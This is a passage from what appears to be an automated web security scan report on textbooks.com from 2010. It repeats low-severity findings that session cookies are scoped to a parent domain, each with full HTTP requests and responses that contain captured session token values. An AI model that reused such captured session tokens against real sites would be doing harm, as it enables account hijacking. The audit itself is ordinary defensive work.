57uEieUQVpKettpmGInz8G0LLzO%2BM%2B8QJyL3zCVcDNIQVpOv0w0LTlwd7NzCbABOGch%2BIW2IReJaYpiZoOIj%2FBSQRZvsrjShwWVO4GPGeQg5VCAeW0mVBSzgkLXXYgorH3gmvaymsuyhKQq6sPRpZ7%2FzPt9cIREY66cvfSZNH6BnUXyEIVD9p12u%2Fgz4DyUbMizmrv6D8LUH2v%2Fty%2FkZ1UT8BwxQGlXF53%2FVZrNbyDdEZpQU%2F%2BcoHql3jDCWLWEKwFn%2BE%2FPtr%2Fj3oEpsZj1IQkiEJ5PPDJM67zojrJI4kadTQEGZCfYYolV8MRO5s4C7o7fZAPmNw039hH9PNVR2wuy%2Bw0HeOfUshbA%2B49mILqIPxYgyPb1TlsjpKk9kOZlqpLBP3vwGM%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=OfgoPtZ5xO56sECzXho%3D; expires=Mon, 26-Dec-2011 13:52:34 GMT; path=/; domain=.textbooks.com
Content-Length: 110012


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.18. http://www.textbooks.com/Catalog/R/Reference-Materials.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/R/Reference-Materials.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/R/Reference-Materials.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=lWW7095Hg1ig8uQW8L4tHoLuc%2FIHIv69fbY%2F7AeSB39DPMmHu7wprb0Q0HEuveRv%2FF6JHL43wqoIKy9W9TrEcCjN66qOeeK7DMBiEcghYgg43a1eRWpySFlrfs0nzwjAeELsCPucykDEds%2FaasQo%2BMz913BNOMqADlkMonkYW9MBONQh0NN7%2Bgn00j1ZrzgQwqf0OUeb9BDYW21oVsj%2FdJdR0akhOZK%2F51wY6BfRV5EgGTM65n%2BFRNRya%2BiLb7JahucPeAbl9x%2BmhOOnO9%2B3vXyI6sQBNk%2BTY5acFyexwVXFLhMPsgJOHhbbt5Xu5IdSMPJ5mwbFVdFqPn0G23%2FsgxWXSWdGDnwAjpfPCi7szYoWTvS4LGvp0bPyoGV64TqdRQST3gkjLXC%2BbjahLgjKOqTj%2FbzQT73DSfMceGTBMfbq%2FkPKTmPT%2FGtUuHOaMhZnFCbq%2B1myev%2BXhT27fOdn4BM6L%2Fq%2FAOHmmRRCrMvZYIIaKogio7haqhIXuzppk1jI5qJaX1kozxHPq5IWmDhRpQLku0MYJlkkU3BbvxgM9zc1ytri%2BSShq9%2FhTtxdwvxu6fP54Qbb639bOftEwkkZ17oex1B%2BbtT08sH6SDsD1RAWJbMd%2FZhco949cbNtw%2FQDSx1DqDAkQoXh%2BduOs%2BSDVxd%2BRU7UcSMHjn5l9oZNqgudx4QOQStpPUhUB%2BQzChVikzK6JsdK%2Fog4ubjTvS2hMxgCLw25pkiH%2B1XnQzeR59%2FWJX%2BOFhdfEbdfCHehsxmIBAcgQ49heBG%2BGipmvLn7TmbTDe51UHYZtp%2FpPMKf%2By8P26TxRMmcJHiJpCosEzKZpVrFuwfiphEoFflcxAxA3kcAMm8pOOlf1FYYkPSvwRCejf5OPPOdLo5KJ0Cpru9WBOvS8%2Finc%2Bqll%2FnFeyHvvk0rWbc3ijPVV7DAaVu8ebTjdB1nJBgYz6ebzHnYvLfhG0DSmbFSifE5Ec7auE2okDMny0YRaQ%2BWN3TokOyNLEKwxuMkCpS0V3kJhmIMjdidEBg97nDyiD8SeC1jRSMxmi3VZ2KHlEn6Z2yfS%2FK2QEf8d19bM3zDIKDLov320SsOOGFH5KTfGYqYqb2rHg8%2FtVYEOATQx92S736NdiA6MdC2IE5Jiufr6Vp4xzmBa8OMrZl8qPdzXdVUks5bTTqiZiZl9UK0X4aE0JsDz6YYNh1MYd8JYJImlyClsU%2FFSyB8h5q54jI2zcv%2FZ0fTzLxvWyE%2FLW5L3yLANRhETaRLMB7IOL3Gu011Zc3dPr0%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=r9T1CLykg7iNlM9mW4g%3D; expires=Mon, 26-Dec-2011 13:52:47 GMT; path=/; domain=.textbooks.com
Content-Length: 124683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.19. http://www.textbooks.com/Catalog/S/Social-Sciences.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/S/Social-Sciences.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/S/Social-Sciences.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=xRQX55189n8zA%2FwnIp1C0b%2F9aBYes8fGlayALGU4Y%2FO38uipRddVmnRDHMN4k%2BItUZODbUe8ekOmkjKJiKXhFx1uP%2F9mLKCdMr4rA%2F7hQ%2B%2BzmI9Ov89MnWeZKHmKi0UT%2FEwu368A%2Bh0LAhbUJMD1ZLPSU9cYltYN2hv03GIZ%2BU8Xz7hlQRm4YQ0%2B6wRLn9EUrpd%2FF716MjY2ZCO3%2BUot8DYeFpodOjX%2FKOYYx0t3KsVyAKRubho5BMJh%2Bfyy%2BJXDdRGM%2FyJIX80Ee46YKxd9y4ZxQnorvbw6O%2Fx3jO9KGLjeSewCeNj0rwbQ5RkaseMHh9OMScRKZQOm18NARKFo7%2B6jQy2eX%2FjVaA1JtXFrUjWCJQvcXaNfglwVJmgYzROpgyK1JSAMBffOZOp5%2BPA9dM2V1HbkWc7pr4U5dYc8zXzBVi4GiT4%2BQpuX9q6yaOWWx9GSLClmeMt76kvQ4M3TStY7mXT9Qxr4EtUIj6qWHcuD9060xc%2BMCD3IpEA44dzi%2FasaSBjO5juu1heSznTBD5NvGwg7eNQ%2FGdoyKJQc7sVHAAoMdxqVF6UatbucxEh04tC3j1tgpSOUrNnfuSV%2BJvHk0NXKZd1NQPCKONaZArniF2A3oMN%2BAnzC14T6R%2Fk91cNFcBvKfMOvqoYyRykzFJUhgA8M4rYmxkm981YU7pPy2Ob8kdrg71TWG2yMtt0%2F4ZLDhxSGghzbSRUVX07N121ZGHsXtHXx3dEwsm0jUYQBBHxQyJDsEnrBw55GW80Ts1NkLVgP%2Fz9nevbJ28rFTrs5XegaNssPcaIofSADlpaKYPKxDtdslIBlz1LsBkZ%2B0V0s6KMNBpQloypKpkScwlDGj%2BHUrnAOexucfo%2BJ1O1ztRiJKFDzyfWN5C9Q3YsftQpVqYZ5NCyxOswNcNhzG1QHvm9QCs7lsuhZQq%2F0X3jQeR3jKmWP5xX6E6NNSX%2F17h5Tk%2F5rgyR2GC%2BDBBcJ7jtjd1Ivhre6NrHXV7fj%2B0r514Xc61RwSQV7hDzpo4aE3U0opmnLBXLw2Wsr2NsLihuZdg6GKV614VLtP8hWTIEciJii35QFPM82aSebcStWKxDdVT9jui%2F9HDiwrNRZt%2BC%2F5Vxoeg%2F5jNbhkQ3ybr6ADZw1nuxUCZem%2BlXmqYvrKgNEbngd5EXIf1c8a17ZwvFECJqUxCpbXVfq2yGeGhdPhPrxsZAVkGgO3aSDFZnm4OoiZLZQ4VHpPyAqec2X1vww5h%2FRIzeekFWbnCtNVHopWLG71yEY2nrxMKo%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=fu4pT4XxuU2DnO1wKnI%3D; expires=Mon, 26-Dec-2011 13:52:55 GMT; path=/; domain=.textbooks.com
Content-Length: 149776


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.20. http://www.textbooks.com/Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=1gyLXHBIfSMKPz%2Fw5IiqSbZ6agOmagd%2B9zhguG5Vt%2BrxTeTjBNSgMTE7jL8Ji9QU4cdawByalwZL9n0brAdnFudnztnjTPBayhZPb8FpYWBkinyNXyQdxVVhl5ADyHN7Njc%2Bi9tOVckiAE%2FXrUokgWoLMgOYdhEafJyJ%2BINyX0WJDiBkhSsaAman7d0oTEWEivU3sWpP5hQbmrdICIewCkt%2F7uPfp8wxtXCmAxB%2BYBEDAaLX5ZHAtj4lasxbloPgb06LFNhEyx1jVTQj%2BUSIDEBNonP9XMNVWzZWwTlf%2BgCtZLYRQ9PFG1B%2BlGJ1m77fMCei8JR89%2Bp2NVJsULWKsIsRVv1f81n3k6LqWDQHLqX51sZ6qVB3By3MhsKrJcOS6wtZAmt7Y5pqbH%2F0v8n942mb4lb934eNLnC4MtRXXyL9XO%2FHaWJ%2F2DeQ4AuEAC2rP9p1AsBnHmNjfUkgt8waYfeUUqUMYPopyN0dTpvblsPc9lBc3Ao3MfzqpMsn2VThteurH9p02FcyYbn8iyxD7tBncAz89FtZ0tHo8DspQb7w%2FxVhbUm5cahrdkSKNNlOO8whuXah9Kg9DvtjUDSDnsGlLAmbe5NLTsnsznKJVZyGqw2KRNaeKXNFqGYN5OO69dPPzDl%2BOoDa678%2BMW2%2BNdVhu%2Fdcje0SDbimNqwdLIVwi%2FvjnvxYfgKF08j9beUaRUYcWPehchsKK11UbkrWdicvDPYqSKDYqJKWC8G3Nr2c11u%2Fl4YlaR00WOldYB0fVgyvQx%2FdFwEvShbLYN%2FWhHBGfZ%2BkQWkFFyqxSV07OtqD4sY%2BBJo4PrfsOcj%2B1XFFCXvnXdwL0nyeCYLHWtMjVQmgFKOquaZlGZGzZoucbjoYjgotpgVGX1HbAkcTGm%2F14VbafyhS3eVWfs5rfLWL4qC6sKq26y%2FgcMDcaVlyYw0SFFuJbxW3QSWciW%2Fc8Cq62edTkCGrq%2FkC20F9yiqEJo5aQ5z1zofKQ1J278fbiNIqV5JrVkUmpa1isbRPwzZl9DqbrqoXFN683FiZF0szTmPFyUWnTXh%2BCZlIjSEoo%2Fgs5UNQScJg7HIYy9Jp3MJAREly8HnXCCPRw8Rpnyl2gp%2FkOl5ebcOf2xNJeXfT6KN0YBalioHGw0BzmqdHy0WZlOmdzpsbn4jPmtrj2TH1htEHHTLzPL6lPAB6vW1VRvrJECH7CHpt715eZZKt8ORsi7L06jU75greL4IaQR850zQeoOi4V0XPnwMk%2FvZnPxOk0w2Z2%2BarOdrS5NY%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=RYtl1QdxWBaKvyvtQEw%3D; expires=Mon, 26-Dec-2011 13:52:06 GMT; path=/; domain=.textbooks.com
Content-Length: 155433


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.21. http://www.textbooks.com/Catalog/V/Vocational-and-Professional-Education.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/V/Vocational-and-Professional-Education.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/V/Vocational-and-Professional-Education.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=diw23%2FKe3OZGzz7eXeDf5b7KG%2FcZmVR6hXoB8ZAZa7nnEqe5l45%2Bqp5xSSlixethcaKgByLIR2W0HXRNyDrZmJa3qk2F7zxApcKGthtBvd784CeWA4Bz0qGxT3yzHSCpUBtLGIz9Fc%2FG7QfiJnfTRM8OgB8P45M%2BHAmeRL1hxvaXZl4%2BhIKyUPEzLIDFnExvi1kk5fSLqZ9D14N2OSxYx4EyqjiJlEFj97Bpitlix3zA79OnNtNMqrV%2FXE7hWVP4aCOrCzZN5%2FoA%2BXebh%2Bcpj%2B8ldGrRG1noPkNbfwZXDOtl1YYcyUNamKCdxTJOua6CbVHeAiKBYLz%2BwgXw0Xla6UhKpp3HGuDQqj6LtCcAvjh7znRvVS%2FCDUYKRCViqno%2BPMQG1yWYDsSrvqY%2BtpCRE4%2Bv3QNdKU%2FbYJ8yz%2BXumN9wSBqQIr623SjzpRWrIc1aVNk0MLTHAarTQO2XdxSJ8Ns31xQic7T%2BZZkNFpLb%2Fz%2FNCJu8ZhqpdOYClKWyZ%2B6m0sKgj8UNbBI6CewScnr3I%2FiZhaF8iNmwalJQQ4QC4hGQA0wTxW5LdJTzZDZMJS0I0TUU12QyTk7iYBtK95GjkCNeLFM1%2BDPS6vrL0YLQQSYkfZETlYLev03pCSTKLSWSKNRcLSu4nYkAA5gxVMAVNYpux2tIegYT1ad8COQhZ2tW3M76Twdb2xYEh3bK020hXCcOKChAVqGUxnvOLO8%2F4YxnqnxNch5SoDLL9Mf0xTV%2B%2B0Fp6RlkuNKDywxfTxHFL6GSoYDrFmtEGz6LzPddsCFgEQzN0bifaAavc3DQdmCWTWaGdwkSsQONOpOBNLRD3XduHem%2FTnbkl7YoB7elZKarX2JdzFAfglwd2F9F7nIgcpsJuGva%2B7j6zNW4kvsuZ4evbv6DHJZCeqUacnU79XoloCbS%2FdNzRg5XgATUzjwQA4LDDGbmQRLLEK0Bvr3sT3S2Ry6Ltx5L4eDsFbqABjN%2FjvJCICcP0YWNOSl3Fuu0SA6O0QIp7jcYr7wGaLNHoKrWHRun34v7UiTQ9BZyTxXFTLc1NZfccF%2BmfaLMrQAROi0AWzO3SuzESJaZTmIbQcanPUdrwzIMiTL0WGCb6MJAgbtMYk333%2Fu%2F6btRLLvMCwAknVNCGjUHxZeNxRmnXZVbei6DaaKvKsLGn86GU%2Bc5RGQcalORxKRRAPkRN%2F478lT9Z2EknlPyqpXa41GUv7pzfAx6y9gRqE89gdkFBhNkJP9JQqc68ostt6UMxlruOMlyL%2BZcNo6wpW4%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=gDudYol3rrcVRWT6jO4%3D; expires=Mon, 26-Dec-2011 13:52:56 GMT; path=/; domain=.textbooks.com
Content-Length: 116160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.22. http://www.textbooks.com/ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

